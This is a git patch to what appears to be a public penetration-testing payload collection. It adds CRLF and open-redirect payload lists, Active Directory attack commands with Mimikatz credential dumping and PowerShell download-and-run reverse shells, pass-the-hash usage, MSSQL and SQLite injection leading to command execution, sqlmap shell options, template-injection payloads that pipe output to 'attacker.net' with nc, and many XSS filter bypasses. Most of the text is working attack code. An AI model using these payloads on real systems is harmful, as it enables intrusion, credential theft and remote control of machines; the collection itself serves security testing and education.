From 30019235f89038a18d7b0d6c7f5e6163e9ee89f2 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 12 Mar 2018 09:17:31 +0100 Subject: [PATCH] SQLmap tips + Active Directory attacks + SQLite injections --- CRLF injection/crlfinjection.txt | 17 +++ .../Active Directory Attack.md | 88 ++++++++++++++ ...atsheet.md => Reverse Shell Cheatsheet.md} | 13 +++ .../Windows - Using credentials.md | 14 ++- Open redirect/openredirects.txt | 67 +++++++++++ Remote commands execution/README.md | 23 ++++ SQL injection/MSSQL Injection.md | 80 +++++++++++++ SQL injection/README.md | 18 +++ SQL injection/SQLite Injection.md | 10 +- SSRF injection/README.md | 9 ++ Server Side Template injections/README.md | 110 +++++++++++++++--- XSS injection/Files/XML XSS.xml | 14 ++- XSS injection/README.md | 54 ++++++++- 13 files changed, 492 insertions(+), 25 deletions(-) create mode 100644 CRLF injection/crlfinjection.txt create mode 100644 Methodology and Resources/Active Directory Attack.md rename Methodology and Resources/{Linux - Reverse Shell Cheatsheet.md => Reverse Shell Cheatsheet.md} (88%) create mode 100644 Open redirect/openredirects.txt create mode 100644 SQL injection/MSSQL Injection.md diff --git a/CRLF injection/crlfinjection.txt b/CRLF injection/crlfinjection.txt new file mode 100644 index 0000000..d7ef4d7 --- /dev/null +++ b/CRLF injection/crlfinjection.txt @@ -0,0 +1,17 @@ +/%%0a0aSet-Cookie:crlf=injection +/%0aSet-Cookie:crlf=injection +/%0d%0aSet-Cookie:crlf=injection +/%0dSet-Cookie:crlf=injection +/%23%0aSet-Cookie:crlf=injection +/%23%0d%0aSet-Cookie:crlf=injection +/%23%0dSet-Cookie:crlf=injection +/%25%30%61Set-Cookie:crlf=injection +/%25%30aSet-Cookie:crlf=injection +/%250aSet-Cookie:crlf=injection +/%25250aSet-Cookie:crlf=injection +/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection +/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection +/%2F..%0d%0aSet-Cookie:crlf=injection +/%3f%0d%0aSet-Cookie:crlf=injection +/%3f%0dSet-Cookie:crlf=injection +/%u000aSet-Cookie:crlf=injection diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md new file mode 100644 index 0000000..0609fb3 --- /dev/null +++ b/Methodology and Resources/Active Directory Attack.md @@ -0,0 +1,88 @@ +# Active Directory Attacks + +## Most common paths to AD compromise + * MS14-068 + * MS17-010 (Eternal Blue - Local Admin) + ```c + nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 + ``` + * Unconstrained Delegation (incl. pass-the-ticket) + * OverPass-the-Hash (Making the most of NTLM password hashes) + * Pivoting with Local Admin & Passwords in SYSVOL + * Dangerous Built-in Groups Usage + * Dumping AD Domain Credentials + * Golden Tickets + * Kerberoast + * Silver Tickets + * Trust Tickets + + +## Tools + * [Impacket](https://github.com/CoreSecurity/impacket) + * Responder + * Mimikatz + * [Ranger](https://github.com/funkandwagnalls/ranger) + * BloodHound + * RottenPotato + +## Mimikatz +``` +load mimikatz +mimikatz_command -f sekurlsa::logonPasswords full +``` + +## PowerSploit +``` +https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon +powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks” +powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" +``` + + +## PrivEsc - Token Impersonation (RottenPotato) +Binary available at : https://github.com/foxglovesec/RottenPotato +Binary available at : https://github.com/breenmachine/RottenPotatoNG +```c +getuid +getprivs +use incognito +list\_tokens -u +cd c:\temp\ +execute -Hc -f ./rot.exe +impersonate\_token "NT AUTHORITY\SYSTEM" +``` + +``` +Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" +Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" +Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" +``` + +## PrivEsc - MS14-068 +``` +Exploit Python : https://www.exploit-db.com/exploits/35474/ + +Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 +``` + +## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) +``` +Powershell: +https://www.exploit-db.com/exploits/39719/ +https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 + +Binary exe : https://github.com/Meatballs1/ms16-032 + +Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc +``` + +## Kerberoast +``` +https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/ +https://room362.com/post/2016/kerberoast-pt1/ +``` + +## Thanks to + * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html) + * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) + * [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1) diff --git a/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md similarity index 88% rename from Methodology and Resources/Linux - Reverse Shell Cheatsheet.md rename to Methodology and Resources/Reverse Shell Cheatsheet.md index 78769a3..4086813 100644 --- a/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -72,6 +72,10 @@ Powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` +```powershell +powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1') +``` + Java ```java r = Runtime.getRuntime() @@ -109,6 +113,14 @@ ruby: exec "/bin/sh" lua: os.execute('/bin/sh') ``` +Access shortcuts, su, nano and autocomplete in a partially tty shell +``` +ctrl+z +stty raw -echo +fg +``` +/!\ OhMyZSH might break this trick + (From within vi) ``` :!bash @@ -124,3 +136,4 @@ lua: os.execute('/bin/sh') * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) * [Spawning a TTY Shell](http://netsec.ws/?p=337) +* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 3e1850b..af66ffd 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -12,6 +12,7 @@ creds ``` ## Metasploit - Psexec +Note: the password can be replaced by a hash to execute a `pass the hash` attack. ```c use exploit/windows/smb/psexec set RHOST 10.2.0.3 @@ -29,6 +30,11 @@ python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami ``` +## Crackmapexec (Pass The Hash) +``` +cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth +``` + ## Winexe (Integrated to Kali) ```python winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe @@ -51,6 +57,10 @@ Note: you may need to enable it with the following command ``` reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f ``` +or with psexec(sysinternals) +``` +psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 +``` ## Netuse (Windows) ``` @@ -69,6 +79,8 @@ PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell ``` + ## Thanks - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) -- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) + - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) + - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) diff --git a/Open redirect/openredirects.txt b/Open redirect/openredirects.txt new file mode 100644 index 0000000..c85c636 --- /dev/null +++ b/Open redirect/openredirects.txt @@ -0,0 +1,67 @@ +/%09/example.com +/%2f%2fexample.com +/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ +/%5cexample.com +/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d +/.example.com +//%09/example.com +//%5cexample.com +///%09/example.com +///%5cexample.com +////%09/example.com +////%5cexample.com +/////example.com +/////example.com/ +////\;@example.com +////example.com/ +////example.com/%2e%2e +////example.com/%2e%2e%2f +////example.com/%2f%2e%2e +////example.com/%2f.. +////example.com// +///\;@example.com +///example.com +///example.com/ +///example.com/%2e%2e +///example.com/%2e%2e%2f +///example.com/%2f%2e%2e +///example.com/%2f.. +///example.com// +//example.com +//example.com/ +//example.com/%2e%2e +//example.com/%2e%2e%2f +//example.com/%2f%2e%2e +//example.com/%2f.. +//example.com// +//google%00.com +//google%E3%80%82com +//https:///example.com/%2e%2e +//https://example.com/%2e%2e%2f +//https://example.com// +/<>//example.com +/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com +/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com +/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com +/\/\/example.com/ +/\/example.com/ +/example.com/%2f%2e%2e +/http://%67%6f%6f%67%6c%65%2e%63%6f%6d +/http://example.com +/http:/example.com +/https:/%5cexample.com/ +/https://%09/example.com +/https://%5cexample.com +/https:///example.com/%2e%2e +/https:///example.com/%2f%2e%2e +/https://example.com +/https://example.com/ +/https://example.com/%2e%2e +/https://example.com/%2e%2e%2f +/https://example.com/%2f%2e%2e +/https://example.com/%2f.. +/https://example.com// +/https:example.com +/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com +/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com +/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 3ffd7b1..5209dc6 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -67,6 +67,29 @@ Commands execution with a line return something%0Acat%20/etc/passwd ``` +Bypass blacklisted word with single quote +``` +w'h'o'am'i +``` + +Bypass blacklisted word with double quote +``` +w"h"o"am"i +``` + +Bypass blacklisted word with $@ +``` +who$@ami +``` + +Bypass zsh/bash/sh blacklist +``` +echo $0 +-> /usr/bin/zsh +echo whoami|$0 +``` + + ## Time based data exfiltration Extracting data : char by char ``` diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md new file mode 100644 index 0000000..91fe273 --- /dev/null +++ b/SQL injection/MSSQL Injection.md @@ -0,0 +1,80 @@ +# MSSQL Injection + +## MSSQL version +``` +SELECT @@version +``` + +## MSSQL database name +``` +SELECT DB_NAME() +``` + +## MSSQL List Databases +``` +SELECT name FROM master..sysdatabases; +SELECT DB_NAME(N); — for N = 0, 1, 2, … +``` + +## MSSQL List Column +``` +SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only +SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable +``` + +## MSSQL List Tables +``` +SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views +SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’; +SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable +``` + + +## MSSQL User Password +``` +MSSQL 2000: +SELECT name, password FROM master..sysxlogins +SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) + +MSSQL 2005 +SELECT name, password_hash FROM master.sys.sql_logins +SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins +``` + +## MSSQL Error based +``` +For integer inputs : convert(int,@@version) +For string inputs : ' + convert(int,@@version) + ' +``` + +## MSSQL Time based +``` +ProductID=1;waitfor delay '0:0:10'-- +ProductID=1);waitfor delay '0:0:10'-- +ProductID=1';waitfor delay '0:0:10'-- +ProductID=1');waitfor delay '0:0:10'-- +ProductID=1));waitfor delay '0:0:10'-- +``` + +## MSSQL Command execution +``` +EXEC xp_cmdshell "net user"; +EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:' +EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1' +``` +If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) +``` +EXEC sp_configure 'show advanced options',1 +RECONFIGURE +EXEC sp_configure 'xp_cmdshell',1 +RECONFIGURE +``` + +## MSSQL Make user DBA (DB admin) +``` +EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; +``` + +## Thanks to + * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) + * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/) diff --git a/SQL injection/README.md b/SQL injection/README.md index 4080da4..1af69f8 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -43,6 +43,22 @@ python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wis sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs ``` +Shell +``` +SQL Shell +python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell + +Simple Shell +python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell + +Dropping a reverse-shell / meterpreter +python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn +``` + +Using suffix to tamper the injection +``` +python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " +``` General tamper option and tamper's list ``` @@ -338,3 +354,5 @@ mysql> mysql> select version(); * Second Order: - [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/) - [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/) +* Sqlmap: + - [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560) diff --git a/SQL injection/SQLite Injection.md b/SQL injection/SQLite Injection.md index 06f88e6..6285dc1 100644 --- a/SQL injection/SQLite Injection.md +++ b/SQL injection/SQLite Injection.md @@ -1,5 +1,9 @@ # SQLite Injection +## SQLite version +``` +select sqlite_version(); +``` ## Integer/String based - Extract table name ``` @@ -34,9 +38,9 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and ## Remote Command Execution using SQLite command - Attach Database ``` -ATTACH DATABASE ‘/var/www/lol.php’ AS lol; +ATTACH DATABASE '/var/www/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); -INSERT INTO lol.pwn (dataz) VALUES (‘’);-- +INSERT INTO lol.pwn (dataz) VALUES ('');-- ``` ## Remote Command Execution using SQLite command - Load_extension @@ -46,4 +50,4 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain'); Note: By default this component is disabled ## Thanks to -[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf) \ No newline at end of file +[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf) diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 471f98d..325c258 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -90,6 +90,13 @@ Bypass using rare address http://0/ ``` +Bypass using bash variables (curl only) +``` +curl -v "http://evil$google.com" + +$google = "" +``` + Bypass using tricks combination ``` http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ @@ -108,6 +115,7 @@ List: ## SSRF via URL Scheme + Dict:// The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol: ``` @@ -230,3 +238,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) * [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow) * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/) +* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51) diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index 639974b..b04d559 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -1,47 +1,127 @@ # Templates Injections -Template injection allows an attacker to include template code into an existant (or not) template. +> Template injection allows an attacker to include template code into an existant (or not) template. + +Recommended tool: [Tplmap](https://github.com/epinna/tplmap) +e.g: +``` +./tplmap.py --os-shell -u 'http://www.target.com/page?name=John' +``` + ## Ruby -#### Basic injection +### Basic injection ```python <%= 7 * 7 %> ``` -#### Retrieve /etc/passwd +### Retrieve /etc/passwd ```python <%= File.open('/etc/passwd').read %> ``` ## Java -#### Basic injection +### Basic injection ```java ${{7*7}} ``` -#### Retrieve the system’s environment variables. +### Retrieve the system’s environment variables. ```java ${T(java.lang.System).getenv()} ``` -#### Retrieve /etc/passwd +### Retrieve /etc/passwd ```java ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} ``` +## Twig +### Basic injection +```python +{{7*7}} +{{7*'7'}} would result in 49 +``` + +### Template format +```python +$output = $twig > render ( + 'Dear' . $_GET['custom_greeting'], + array("first_name" => $user.first_name) +); + +$output = $twig > render ( + "Dear {first_name}", + array("first_name" => $user.first_name) +); +``` + +### Code execution +```python +{{self}} +{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} +{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +``` + + +## Smarty +```python +{php}echo `id`;{/php} +{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} +``` + +## Freemarker +Default functionality. +```python +<#assign +ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} +``` + +## Jade / Codepen +```python +- var x = root.process +- x = x.mainModule.require +- x = x('child_process') += x.exec('id | nc attacker.net 80') +``` + +## Velocity +```python +#set($str=$class.inspect("java.lang.String").type) +#set($chr=$class.inspect("java.lang.Character").type) +#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) +$ex.waitFor() +#set($out=$ex.getInputStream()) +#foreach($i in [1..$out.available()]) +$str.valueOf($chr.toChars($out.read())) +#end +``` + +## Mako +```python +<% +import os +x=os.popen('id').read() +%> +${x} +``` + + ## Jinja2 [Official website](http://jinja.pocoo.org/) > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. -#### Basic injection + +### Basic injection ```python {{4*4}}[[5*5]] +{{7*'7'}} would result in 7777777 ``` Jinja2 is used by Python Web Frameworks such as Django or Flask. The above injections have been tested on Flask application. -#### Template format +### Template format ```python {% extends "layout.html" %} {% block body %} @@ -54,12 +134,12 @@ The above injections have been tested on Flask application. ``` -#### Dump all used classes +### Dump all used classes ```python {{ ''.__class__.__mro__[2].__subclasses__() }} ``` -#### Dump all config variables +### Dump all config variables ```python {% for key, value in config.iteritems() %}
{{ key|e }}
@@ -67,18 +147,18 @@ The above injections have been tested on Flask application. {% endfor %} ``` -#### Read remote file +### Read remote file ```python # ''.__class__.__mro__[2].__subclasses__()[40] = File class {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} ``` -#### Write into remote file +### Write into remote file ```python {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} ``` -#### Remote Code Execution via reverse shell +### Remote Code Execution via reverse shell Listen for connexion ``` nv -lnvp 8000 @@ -94,5 +174,5 @@ Inject this template * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) -#### Training -[https://w3challs.com/](https://w3challs.com/) + * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) + * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) diff --git a/XSS injection/Files/XML XSS.xml b/XSS injection/Files/XML XSS.xml index e7a6635..050b157 100644 --- a/XSS injection/Files/XML XSS.xml +++ b/XSS injection/Files/XML XSS.xml @@ -2,5 +2,17 @@ alert(1) + + + + confirm(document.domain)]]> + + + Hello + + + http://google.com + + - \ No newline at end of file + diff --git a/XSS injection/README.md b/XSS injection/README.md index 48a3690..a4fd0b6 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -71,6 +71,12 @@ XSS for HTML5 ``` +XSS using script tag (external payload) +``` +]]> + +``` + + +XSS in XML ``` @@ -432,6 +446,17 @@ Bypass case sensitive ``` +Bypass tag blacklist +``` +"; ``` + Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) ``` window['alert'](0) @@ -566,6 +588,22 @@ Bypass ';' using another character 'te' instanceof alert('instanceof') instanceof 'xt'; ``` +Bypass using HTML encoding +``` +%26%2397;lert(1) +``` + +Bypass using Katakana (https://github.com/aemkei/katakana.js) +``` +javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() +``` + +Bypass using Octal encoding +``` +javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' +``` + + Bypass using Unicode ``` Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was @@ -672,6 +710,12 @@ Exotic payloads